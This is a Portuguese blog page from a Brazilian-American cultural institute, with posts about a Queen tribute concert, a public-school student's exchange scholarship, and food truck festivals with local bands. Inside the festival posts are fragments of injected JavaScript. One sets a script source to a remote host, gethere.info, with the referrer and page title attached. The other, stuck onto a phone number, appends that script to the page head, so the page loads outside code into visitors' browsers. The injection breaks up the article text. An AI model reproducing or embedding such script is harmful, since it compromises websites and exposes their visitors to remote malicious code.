Tributo ao Queen com banda Cometz no Friday Night Live

Aproveitando a febre do incrível Bohemian Rhapsody, a banda Cometz fará um Tributo ao Queen no dia 23/11 (sexta-feira) no Cultural Hall, dentro da programação do Friday Night Live. Com uma performance marcante, figurinos característicos e arranjos executados com fidelidade, a banda apresenta os grandes sucessos do Queen em um show cheio de energia onde a participação do público torna o espetáculo ainda mais emocionante!

Estamos preparando um show emocionante e teremos a participação de Murilo Beltrame nos pianos e teclados! Chame os amigos, leve a família, venha cantar junto!

Serviço

O show começa pontualmente às 20h30. A entrada será apenas 1kg de alimento não perecível e os convites devem ser retirados a partir de terça-feira (13/11) no Cultural .

DE UM SONHO PARA JOVEM EMBAIXADOR

Estudante da rede pública de ensino, é selecionado como jovem embaixador 2017 e ganha bolsa de estudos no Instituto Cultural Brasil Estados Unidos.

Gabriel Vinicius de Souza – Jovem Embaixador 2017.

Quando o próximo torna-se prioridade, as portas se abrem e tudo acontece. Este é o caso do estudante de física, Gabriel Vinicius de Souza, 17, que ao ver a realidade dos colegas, decidiu descruzar os braços e pôr a mão na massa.

Estudante da rede pública, Gabriel via a dificuldade que muitos adolescentes encontravam em certas matérias. Foi aí que o jovem pensou, “os alunos precisam de alguém que os ajude fora das salas de aula, será que eu posso fazer alguma coisa para ajudar? ”

Desde então, com a ajuda da vice-diretora, que abraçou o projeto, o garoto passou a monitorar grupos de alunos. Foram dois anos de muito esforço e dedicação que resultaram em um prêmio mais que merecido. Gabriel que sempre teve o sonho de estudar fora, viu seu sonho virar realidade.

A professora de inglês da escola, ficou sabendo de um programa chamado Jovens Embaixadores que tem o objetivo de levar aos Estados Unidos “alunos brasileiros da rede pública que são exemplos em suas comunidades. – (Jovens Embaixadores). Ao falar do programa em sala de aula o jovem interessou-se e inscreveu-se e a partir de então seus dias tornaram-se uma eterna expectativa.

Após muitas fases de seleção, a maioria realizadas aqui no Cultural, no dia 28 de outubro de 2016 a notícia mais esperada do ano chegou. Gabriel havia sido selecionado como Jovem Embaixador 2017.

Foram 3 semanas inesquecíveis, recheadas de novidades, workshops, passeios e estudos. O jovem embaixador conheceu Lake Tahoe, Tulsa e Washington. Mas dos três destinos o estudante ficou boquiaberto com Lake Tahoe “um dos lugares mais bonitos que eu já vi na vida. Ele é um lago que é totalmente puro”. E é puro mesmo, o lago tem 99,94% de pureza e 600 metros de profundidade.

Ao voltar para o Brasil as surpresas não terminaram, o Instituto Cultural, deu ao notório estudante uma bolsa de estudos para concluir o inglês e receber um certificado de proficiência. Já estudando aqui, ele nos contou como está sendo, “Está sendo muito legal! Porque eu estou realmente aperfeiçoando tudo o que eu aprendi. E podendo estudar gramática mais afundo que é o meu problema, está sendo muito bom”.

Ele não parou por aí, no futuro pretende continuar o trabalho voluntário, aprender mais duas línguas, ser professor de física e ainda quer ser professor aqui do Cultural. Para todos que querem seus sonhos realizados ele deixou um recadinho: “Você só precisa querer! Se você não tem um nível muito bom de inglês, vai, se dedica, estude e você vai conseguir. Não desista! ”.

 

FREAKNAITES ANIMA A GALERA NO CULTURAL FOOD TRUCK FESTIVAL

No dia 13 de dezembro, a banda Freaknaites subiu ao palco do Cultural e agitou a galera durante o segundo Cultural Food Truck Festival.

O grupo levou ao público, o melhor de Stevie Wonder, Joe Cocker, BB King, Eric Clapton, Nina Simone, Etta James, Ray Charles e muito mais.

O evento começou com a Formatura dos alunos do Instituto Cultural Brasil Estados Unidos (apenas para convidados) e posteriormente foi aberto para o público em geral.

Rafael Fregonezi, estava entre os formandos da noite e adorou o novo formato da formatura. “Achei muito legal a ideia de aliar nossa formatura com os famosos Food Trucks e com uma banda com um som tão bacana”.

O formando Pedro, também elogiou o evento e aprovou a ideia de uma formatura com um estilo um pouco menos formal. “Achei mais jovem e descontraído. Minha família também gostou e afirmou achar importante essa evolução”.

Já amigas Ana Carolina, Ana Paula e Isadora foram apenas prestigiar ao evento, mas também adoraram a proposta de unir comida e música boa em um só lugar.

“Essa iniciativa de levar a cultura americana aos alunos e a comunidade como um todo, de maneira divertida e descontraída é, sem dúvida, um dos grandes diferenciais que admiramos no Cultural”.

O baixista e vocalista da banda, Alessandro Franco também elogiou o projeto e a iniciativa da escola. “Para nós da Freaknaites é sempre um prazer tocar no Cultural. Desta vez foi ainda melhor, porque o evento foi ao ar livre e, tocar assim tem mais a ver com a cara e proposta da banda. O espaço e a estrutura foram perfeitos para os food trucks e o palco, proporcionando um show agradável tanto para os músicos quanto para o público. Londrina precisa de mais eventos assim”.

E se você não conseguiu comparecer ao Cultural Food Truck Festival, fique ligado aqui no nosso blog, que em 2017 traremos novas atrações pra você.

 s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

FREAKNAITES SOBE AO PALCO DO 2º CULTURAL FOOD TRUCK FESTIVAL

No próximo dia 13 de dezembro, o Cultural irá realizar o segundo Cultural Food Truck Festival, com a participação da banda Freaknaites.

O evento irá começar às 19 horas com a Formatura dos alunos do Cultural (apenas para convidados), e a partir das 20:30 os portões serão abertos para o público em geral.

No cardápio dos Food Trucks, os visitantes irão encontrar desde hambúrgueres, massas, churros, gastronomia chinesa, crepe francês, petiscos em geral, até o famoso chop artesanal.

Já para a programação musical está confirmado um super show com a banda Freaknaites. Formada em 2013, a banda resulta de uma fusão de vários gêneros musicais, como Blues, Soul/Groove, Rock e Jazz.

Composta pelos músicos André Perez (guitarra e vocal), Vitor Struck (guitarra e vocal) Alessandro Franco (baixo e vocal) e André Coudeiro (bateria e vocal), o grupo traz em seu repertório, o melhor dos anos 60 e 70.

Para a apresentação, eles prometem grandes sucessos de Stevie Wonder, Joe Cocker, BB King, Eric Clapton, Nina Simone, Etta James, Ray Charles e muito mais.

O show começa à partir das 20h30 e é gratuito.

Outras informações na secretaria da escola, através do telefone (43) 3375-9999.d.getElementsByTagName(‘head’)[0].appendChild(s);

SENHOR BONIFÁCIO AGITA A GALERA NO PRIMEIRO CULTURAL FOOD TRUCK FESTIVAL

 

No último dia 19 de outubro, a banda londrinense Senhor Bonifácio agitou a plateia do 1º Cultural Food Truck Festival.

O grupo levou ao público, o melhor de Beatles, Stones, Led Zeppelin, AC/DC, Red Hot, Strokes, Franz Ferndinand, Queen, The Killers e muito mais.

Na plateia, estavam a cônsul americana Sara Besoulov e sua companheira de trabalho Vanessa Diniz. “Viemos trabalhar em Londrina, e recebemos o convite para prestigiar o evento. E achamos incrível! Um ambiente extremamente agradável, com ótima opções de comida e música boa. Além disso, a banda possui um inglês muito bom. É uma oportunidade dos alunos terem um maior contato com a cultura americana de maneira descontraída”, afirmou a cônsul.

Vanessa também elogiou o evento. “ Foi muito divertido e com opções de gastronomia bastante diversificadas. Embora o evento promova a cultura americana, ele possui um ingrediente brasileiro que faz toda diferença: a alegria”.

O vocalista da banda, Marcelo Celligoi, também elogiou o projeto e a iniciativa da escola. “Foi um evento sensacional! A galera estava muito animada. E foi bacana ver pessoas até de outras cidades apreciando o evento”.

Para o baixista e tecladista, Eduardo Sahão, a ideia de juntar comida e música boa, levando a cultura para a população foi sensacional!

As amigas Lilian Fukuda, Eliane Vieira e Susy Naomi, que estavam na plateia, afirmaram que sempre vão curtir as bandas que se apresentam no Friday Night Live (promovido pelo Cultural), e que acharam ótima a ideia de juntar food truck com música boa em um ambiente tranquilo e familiar”.

E você que não conseguiu comparecer ao primeiro Cultural Food Truck Festival, fique ligado aqui no nosso blog e não perca as nossas próximas atrações!

Matrículas Abertas